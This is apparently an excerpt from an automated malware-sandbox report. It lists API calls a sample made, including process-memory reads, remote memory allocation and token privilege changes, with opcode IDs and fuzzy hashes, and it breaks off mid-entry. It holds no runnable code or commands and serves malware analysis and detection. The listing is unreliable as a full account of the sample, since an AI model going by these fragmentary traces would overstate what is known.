                                                    Function 001D42C8, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 001D4348
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2170677739.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: 2ee6bb3e2cb84b377167947c312290127155a1e7a8715ec3f62b9adbfa16fd6b
                                                    • Instruction ID: c01837e3e3bf9fc1b29672ebf7c56ac1ac64a66d74401c4f0a4f3f9dfeb043ae
                                                    • Opcode Fuzzy Hash: 2ee6bb3e2cb84b377167947c312290127155a1e7a8715ec3f62b9adbfa16fd6b
                                                    • Instruction Fuzzy Hash: 672116719002199FCB10CFAAC844BEEBBF5FF48310F54882AE919A7240D778A911CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 001D3D10, Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 001D3D86
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2170677739.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 205a4ba455f97d181c37a70eb41f6b001f3b87b99f0d78e197354d11608083f6
                                                    • Instruction ID: 65bb3331674ace8f8890d0f777149f086738f2ffa4dc01e4cf1e0b2df4cb3f4b
                                                    • Opcode Fuzzy Hash: 205a4ba455f97d181c37a70eb41f6b001f3b87b99f0d78e197354d11608083f6
                                                    • Instruction Fuzzy Hash: B92144719042499FCB10CFA9D844BEEBFF6AF89314F24881AD419A7250C779AA00CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 001D3D18, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 001D3D86
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2170677739.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: da14dcb030cef0ef045f9a5f83cdedbf79d993d15640f52c1f7dd5caedfc06df
                                                    • Instruction ID: c22bccf66a9f2986bd3c31f9c25ae66ea75135b09c46156e968f7b791ef3a470
                                                    • Opcode Fuzzy Hash: da14dcb030cef0ef045f9a5f83cdedbf79d993d15640f52c1f7dd5caedfc06df
                                                    • Instruction Fuzzy Hash: 00112671900209DBCB10DFAAC844BEFBFF6EF89314F24881AD519A7250C775AA50CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 001D1987, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 001D19B8
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2170677739.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 760ac3e7c59ac40180e1f9cb07475d2d1aff8c3f99d8954a9fe7dae699fcc520
                                                    • Instruction ID: 02bd5b4256afc53090917545536343389467466155562fdb254bbeef3ba1046e
                                                    • Opcode Fuzzy Hash: 760ac3e7c59ac40180e1f9cb07475d2d1aff8c3f99d8954a9fe7dae699fcc520
                                                    • Instruction Fuzzy Hash: 03F01C71D053098FCB88EF78D4BA59A7FF0FF98204B104A6AD546DBA09EA702602DF40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 001D1998, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 001D19B8
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2170677739.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 1e7fef739ff808b6893fdbdd40187c604095c755ae6dc5eebbb204751bf88fa1
                                                    • Instruction ID: 05b102d02a47536a5f6efdb63b0b0360048dbb69ec10d0debed1746439f50b33
                                                    • Opcode Fuzzy Hash: 1e7fef739ff808b6893fdbdd40187c604095c755ae6dc5eebbb204751bf88fa1
                                                    • Instruction Fuzzy Hash: 57E01A70900309DFC748EFB8E86A51A7BF0BB48204B10456AD80AD3708EB705901CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0013D01C, Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2170493405.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0fccfe9ce844901ad0c9bc66d33be36ba9927e1d4a61a65dd69f81ee09d54a5b
                                                    • Instruction ID: 849c282c8d2675e6d3403bf423ad6d707d402cfc61910d265b18eed8a96a33a4
                                                    • Opcode Fuzzy Hash: 0fccfe9ce844901ad0c9bc66d33be36ba9927e1d4a61a65dd69f81ee09d54a5b
                                                    • Instruction Fuzzy Hash: 9221F275604204DFDB18CF60F984B16BBA5FB88B14F24C9A9E8494B346C336D847CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0013D006, Relevance: .1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2170493405.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0d4d1891c80aa91e5cd20667cb2685b9e4d0f21e3291cfd548351f9581df3e52
                                                    • Instruction ID: 4698269574757a894325b314b47f151c30b48a5e4acc66bdc8d2addee85b8ffa
                                                    • Opcode Fuzzy Hash: 0d4d1891c80aa91e5cd20667cb2685b9e4d0f21e3291cfd548351f9581df3e52
                                                    • Instruction Fuzzy Hash: 0C2141755083809FCB06CF14E994715BFB1EB46714F24C5DAD8498F256C33AD856CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 002E2050, Relevance: .4, Instructions: 400COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2171042413.00000000002E2000.00000020.00020000.sdmp, Offset: 002E0000, based on PE: true
                                                    • Associated: 00000004.00000002.2171015728.00000000002E0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000004.00000002.2177070083.0000000000618000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 69cfafafdcd6af3469af387efaa7d0b8a62b2f0a5bc8b8a577941b7fc4102193
                                                    • Instruction ID: 7b646f47ec383e2dc653d50ed4f218f99258a556fcdc7784437607f3245f8cc3
                                                    • Opcode Fuzzy Hash: 69cfafafdcd6af3469af387efaa7d0b8a62b2f0a5bc8b8a577941b7fc4102193
                                                    • Instruction Fuzzy Hash: FAF1447244E3D28FCB178B748CB56917FB4AE5721470E08DBD0C18F0B7D2296A5ADB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Analysis Process: powershell.exe PID: 2536 Parent PID: 2336 powershell.exeCOMMON

                                                    Executed Functions

                                                    Function 0037ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0037AD37
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: 60c3c5bf9e5d28637509572b7a558e0c39a37feed3a0508a8ab6d6ca480981e1
                                                    • Instruction ID: 41445ef38eca3c0d21d112d97278e1f6c61f6f286f05406795db94f4da056dbf
                                                    • Opcode Fuzzy Hash: 60c3c5bf9e5d28637509572b7a558e0c39a37feed3a0508a8ab6d6ca480981e1
                                                    • Instruction Fuzzy Hash: E421B1755097809FDB238F25DC44B92BFB4EF16310F09849AE9888B563D2359908DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0037AD37
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: 84f8eaa641f9393e41e0b9d9990e392cee341e9311676a18835ede783de94d22
                                                    • Instruction ID: 47c0c86fc5378103d9ea161ba74151ff922958b3aa35f06f460dbf2e41fada3d
                                                    • Opcode Fuzzy Hash: 84f8eaa641f9393e41e0b9d9990e392cee341e9311676a18835ede783de94d22
                                                    • Instruction Fuzzy Hash: 9E118C75500B009FEB318F55D884B9AFBA4EB44321F08C46AED498AA62D335E818DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0037B329
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 0d9f17c5386a6a18289b7e7c517f3811d03fe8efd1e2b726d7723697ad6de2d7
                                                    • Instruction ID: ed081b04cd49c14172620100ac3fdf7c638722fd349db3b28e3814907049adb8
                                                    • Opcode Fuzzy Hash: 0d9f17c5386a6a18289b7e7c517f3811d03fe8efd1e2b726d7723697ad6de2d7
                                                    • Instruction Fuzzy Hash: 3D11A075508780AFDB228F11DC45F62FFB4EF06320F09C49AED884B663C275A818DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0037B329
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: ade3fcbbb2be92c67fe40d434dae58b8d46fe295e28169a4defb227d4644f842
                                                    • Instruction ID: d7f1c6925cc47913a28e73e1173772f760b732bc9f80fd06515fea6f331a3a19
                                                    • Opcode Fuzzy Hash: ade3fcbbb2be92c67fe40d434dae58b8d46fe295e28169a4defb227d4644f842
                                                    • Instruction Fuzzy Hash: 6801AD35500700DFEB319F05D885B66FFB0EF18720F08C19ADD894BA12C379A458DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DB096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 01DB099C
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: ac2022e32ff2e9a8cf3e320c2e1fc60d037ec587fe34360428e57bfcb521049e
                                                    • Instruction ID: 38dc6dc841a53ce29a8a21b98f8c61c6982d3f1dfe8abec2f47e3bd8892904ee
                                                    • Opcode Fuzzy Hash: ac2022e32ff2e9a8cf3e320c2e1fc60d037ec587fe34360428e57bfcb521049e
                                                    • Instruction Fuzzy Hash: 4DF0AF35504740DFEB209F05D8857A6FFA0EF04621F08C09AED8A4B716D675E408CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DB0118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 01DB01D0
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: 75375f8be730d100b8004736cf1bbd2bf0c41847d368368f2cc1424e1417c7de
                                                    • Instruction ID: e1559ebd3ba332e59733b4b0ba5e660a473f4dd606a57d3b155a011ba79800b4
                                                    • Opcode Fuzzy Hash: 75375f8be730d100b8004736cf1bbd2bf0c41847d368368f2cc1424e1417c7de
                                                    • Instruction Fuzzy Hash: 29314A7650E3C08FE7138B759CA5692BFB4AF07210F0E84DBD885CF1A3D6259809DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DB067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 01DB072D
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: c007ddccf7fca5b92cfe4acead7265da581b916bf14bd50ebff8817fca6331d6
                                                    • Instruction ID: 7d6c255107d0c976eb9c2ce686f21cd39b55dcad944a68638cf03e568fec12aa
                                                    • Opcode Fuzzy Hash: c007ddccf7fca5b92cfe4acead7265da581b916bf14bd50ebff8817fca6331d6
                                                    • Instruction Fuzzy Hash: AB317071505380AFE722CF65CC85F96FFF8EF09210F09849EE9858B292D365A808CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DB0D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 01DB0DD6
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: 75b7362c00bc669ab118ee7e81287327ce4661e318c9ee9b56a5e23e19309184
                                                    • Instruction ID: 3831439d5fa13f15bf833ccfd3de0ef6dbb5556681789fbdf16e7eae21632881
                                                    • Opcode Fuzzy Hash: 75b7362c00bc669ab118ee7e81287327ce4661e318c9ee9b56a5e23e19309184
                                                    • Instruction Fuzzy Hash: 6D31C871509380AFE712CB25DC85B96BFF8DF06210F0884AAF985CF293D275A909C772
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,70D6F4DC,00000000,00000000,00000000,00000000), ref: 0037AFBE
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: 31610579171758b23f5d948dc45236847bdffeeb531598387af5f9b219d0e313
                                                    • Instruction ID: c8c2a3b40655da5aeeaef28d5a8043dfb1fe0a75cba9fd1dfb39b64daeaebd76
                                                    • Opcode Fuzzy Hash: 31610579171758b23f5d948dc45236847bdffeeb531598387af5f9b219d0e313
                                                    • Instruction Fuzzy Hash: 4A21D5B2509780AFE7128B20DC45B96BFB8EF06320F0984DAE984DB193C325A949C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,70D6F4DC,00000000,00000000,00000000,00000000), ref: 0037BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: e35341d00d43eba634d4b91009718b814925b133d1b1443a9cb42383114a2bd0
                                                    • Instruction ID: b2304a70134ee75c61097d06fa4f7a51af216af7c200086ff8ad69f3b840df96
                                                    • Opcode Fuzzy Hash: e35341d00d43eba634d4b91009718b814925b133d1b1443a9cb42383114a2bd0
                                                    • Instruction Fuzzy Hash: A131B471109384AFE722CB60DC45F97BFB8EF06310F09859BE984DB192D224A908C761
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037A1A8, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnumWindows.USER32(?,00000E9C,?,?), ref: 0037A23E
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumWindows
                                                    • String ID:
                                                    • API String ID: 1129996299-0
                                                    • Opcode ID: eda08a1451514d16d6f2885b1ecee035740097fa0ee05ac431b93cfa0dcf14cf
                                                    • Instruction ID: 75bd1d07f53c33f86ccd9e6f181edcd89de18a6d7dbcaf4f5d71945f5d08f403
                                                    • Opcode Fuzzy Hash: eda08a1451514d16d6f2885b1ecee035740097fa0ee05ac431b93cfa0dcf14cf
                                                    • Instruction Fuzzy Hash: 4221E17180D7C06FD3128B318C45B66BF74EF83220F1981DBD884CF293D229A919CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DB0FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 01DB109E
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: 2efe451858169d1dd2b58ebf13c3710541738ee8e9cd87957c0864adf2afc092
                                                    • Instruction ID: 6d5c78697988fa61209bc34115c7e9d9506d07e5facbf9b6c68d70aca2777e24
                                                    • Opcode Fuzzy Hash: 2efe451858169d1dd2b58ebf13c3710541738ee8e9cd87957c0864adf2afc092
                                                    • Instruction Fuzzy Hash: 6531717550E3C06FD3138B358C55B56BFB4AF43610F1A81DBD884CF2A3D629A909C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,70D6F4DC,00000000,00000000,00000000,00000000), ref: 0037B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: 9e7777f3e763322a79b5899e105e42d5564bdfd00bc0c6b6a9be704dfbcb7284
                                                    • Instruction ID: e02947cb5618cf8fff8f047bbc8710f5f35bd61aa846bb188c4aafe62f0e0b40
                                                    • Opcode Fuzzy Hash: 9e7777f3e763322a79b5899e105e42d5564bdfd00bc0c6b6a9be704dfbcb7284
                                                    • Instruction Fuzzy Hash: 7A219171505380AFE722CB15CC45FA7FFB8EF06320F09849AE949DB152D768A908CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DB0784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,70D6F4DC,00000000,00000000,00000000,00000000), ref: 01DB0819
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: c4ab8291df03605c0343796f5cc3b25c1757d231d6e31cdce635e1c1d269c559
                                                    • Instruction ID: d8d03815dd4ed20da6de21b170d302d96daf2f120bf97cddadff13b49e8abdc6
                                                    • Opcode Fuzzy Hash: c4ab8291df03605c0343796f5cc3b25c1757d231d6e31cdce635e1c1d269c559
                                                    • Instruction Fuzzy Hash: 01210A76408780AFE712CB159C81FA7BFB8EF46720F0881DBF9858B193D224A909C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DB0464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 01DB0502
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: 42a605e81c52fd2daed94c06a504b3636abeb926d4842078143113a64383abd7
                                                    • Instruction ID: f95f472fb047f3d18c85e4ebe554c8dfdf5127fe3b61353998bd3d04bc5314c9
                                                    • Opcode Fuzzy Hash: 42a605e81c52fd2daed94c06a504b3636abeb926d4842078143113a64383abd7
                                                    • Instruction Fuzzy Hash: 4C21AF7540E3C0AFD3128B358C55B62BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DB06AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 01DB072D
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: b46f25b9e71cc9d7fe0955e7e7d27c3ea704ba79da931af6a28e96717c88d442
                                                    • Instruction ID: d26da8b6f47b42c5a61b798fa08d29fbef8f6c36a9ff706cafb16090cd007726
                                                    • Opcode Fuzzy Hash: b46f25b9e71cc9d7fe0955e7e7d27c3ea704ba79da931af6a28e96717c88d442
                                                    • Instruction Fuzzy Hash: FC218171500704EFEB21DF65CC85FA6FBE8EF08650F04846AE98A9B692D771E904CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DB0854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,70D6F4DC,00000000,00000000,00000000,00000000), ref: 01DB08E5
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 04a217bb75dba6ca6b43d1fec465eca4ff6e672ecb8dee4c1c5f016c9817726e
                                                    • Instruction ID: ec53ce4422621333e86a8e831be4664af87485b566e5f35048a73257fea547ed
                                                    • Opcode Fuzzy Hash: 04a217bb75dba6ca6b43d1fec465eca4ff6e672ecb8dee4c1c5f016c9817726e
                                                    • Instruction Fuzzy Hash: 46219271409380AFE722CF51DC45F97BFB8EF06314F09859BE9859B153C265A909CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037A8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0037A94A
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: 438029cb9150c553e5276cff6785ca677cc9fa5d2d01c03f880b6a10f5b2808b
                                                    • Instruction ID: af99a63a2e87fa0bdf5b5e96455452d33a4436679e8c3302020a4ac390c75c81
                                                    • Opcode Fuzzy Hash: 438029cb9150c553e5276cff6785ca677cc9fa5d2d01c03f880b6a10f5b2808b
                                                    • Instruction Fuzzy Hash: 31219575509780AFD3138B259C51B62BFB4EF87610F0981DBE8848B653D224A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DB0D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 01DB0DD6
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: 4f6c20cc3cdc16225d9e6156b4e029202725ebaa05cd80d417bb0dadcbc95811
                                                    • Instruction ID: 0496debb5e909fe92948f54d01db4e883dd7ace0d382c4b282d4b1f234a44537
                                                    • Opcode Fuzzy Hash: 4f6c20cc3cdc16225d9e6156b4e029202725ebaa05cd80d417bb0dadcbc95811
                                                    • Instruction Fuzzy Hash: CD216271500344EFF721DB29DC85B9BFBE8DF08650F04846AE946DB682D675E9048A61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,70D6F4DC,00000000,00000000,00000000,00000000), ref: 0037BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: 001364dea5ab5758c4811ded0f49d4179a09c4f82fd7d4af10c037b0d940766e
                                                    • Instruction ID: f7e8f91d385a50e89b40bba7f254761948edb687a0da34933eb8c8948fa063ca
                                                    • Opcode Fuzzy Hash: 001364dea5ab5758c4811ded0f49d4179a09c4f82fd7d4af10c037b0d940766e
                                                    • Instruction Fuzzy Hash: 63119D72500704EFEB21DF51DC85FABFBACEF04320F14856AF949DA641D674A9088BB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,70D6F4DC,00000000,00000000,00000000,00000000), ref: 0037B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: 40b6524c20728eab63bec77593d95bf01fa5ad645ca07f71c70802ba820d5bd7
                                                    • Instruction ID: e8fb66e79cb398df4861fbdee0885647cff6ea4e947edb5a048679f5e760e89b
                                                    • Opcode Fuzzy Hash: 40b6524c20728eab63bec77593d95bf01fa5ad645ca07f71c70802ba820d5bd7
                                                    • Instruction Fuzzy Hash: B9116771600700EFEB21DF15DC85FABFBA8EF04760F14C46AE909DB681D764A9088AA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DB137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2119025987.0000000001DB0000.00000040.00000001.sdmp, Offset: 01DB0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: 99c67effe42a67efcf2e4251703bfd2e419014049504012bf1c743c0211dfe4c
                                                    • Instruction ID: 0eb3416af980688cd5974751933f018027cf9d69dfbd7d770a61ecc7cee1ae2d
